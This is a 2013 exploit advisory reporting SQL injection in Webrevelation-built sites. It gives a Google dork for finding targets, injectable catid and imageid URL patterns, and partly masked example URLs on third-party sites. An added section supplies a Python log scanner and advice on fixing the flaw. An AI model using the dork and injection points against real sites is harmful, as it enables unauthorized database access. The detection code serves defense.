===========================================================
Site by Webrevelation SQL Injection Vulnerability
===========================================================
:-----------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site by Webrevelation SQL Injection Vulnerability
: # Date : 03 May 2013
: # Author : X-Cisadane
: # Vendor : www.webrevelation.com
: # Version : All Versions
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US)
: # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Mantan Gw
:-----------------------------------------------------------------------------------------------------------------------:
DORKS (How to find the target) :
intext:"Site by Webrevelation"
Proof of Concept
=================
http://[Site]/[Path]/gallery_images.php?catid=['SQLi]
http://[Site]/[Path]/gallery_image.php?imageid=['SQLi]
http://[Site]/[Path]/photogallery.php?catid=['SQLi]
http://[Site]/[Path]/photo_categories.php?catid=['SQLi]
Example :
http://brusXXXusters.net/html/gallery_images.php?catid='5
http://www.ocoXXrslawn.com/html/gallery_images.php?catid=-10
http://www.lachXmaison.com/html/gallery_images.php?catid='20
http://www.croXoak.org/html/photo_categories.php?catid=-17
...
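
Added example (not part of the original advisory): a log check a site operator could run to spot requests matching the patterns above, where the ID parameter of one of the four listed scripts is anything other than a plain non-negative integer. It assumes combined-format access logs and that legitimate IDs are non-negative integers; the sample log lines, addresses and paths are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name -> ID parameter, as listed in the advisory's PoC patterns.
WATCHED = {
    "gallery_images.php": "catid",
    "gallery_image.php": "imageid",
    "photogallery.php": "catid",
    "photo_categories.php": "catid",
}
# Assumption: combined/common access-log format ('IP ... "METHOD target HTTP/x.y" ...').
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_value(target):
    """Return (script, param, value) when a watched ID is not a plain integer, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param is None:
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl percent-decodes, so %27 is compared as a literal quote.
        if name == param and not re.fullmatch(r"[0-9]{1,10}", value):
            return script, param, value
    return None

def scan(lines):
    """Collect (client_ip, script, param, decoded_value) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        found = suspicious_value(m.group("target")) if m else None
        if found:
            hits.append((m.group("ip"), *found))
    return hits

# Constructed sample lines (documentation IP ranges, made-up paths and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/May/2013:10:00:01 +0000] "GET /html/gallery_images.php?catid=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/May/2013:10:00:02 +0000] "GET /html/gallery_images.php?catid=%275 HTTP/1.1" 200 312',
    '203.0.113.9 - - [03/May/2013:10:00:03 +0000] "GET /html/photo_categories.php?catid=-17 HTTP/1.1" 200 298',
    '198.51.100.4 - - [03/May/2013:10:00:04 +0000] "GET /html/gallery_image.php?imageid=12 HTTP/1.1" 200 4096',
    '198.51.100.4 - - [03/May/2013:10:00:05 +0000] "GET /html/index.php?catid=%27 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is what the affected scripts should enforce on catid and imageid before the value reaches a query, together with parameterized statements.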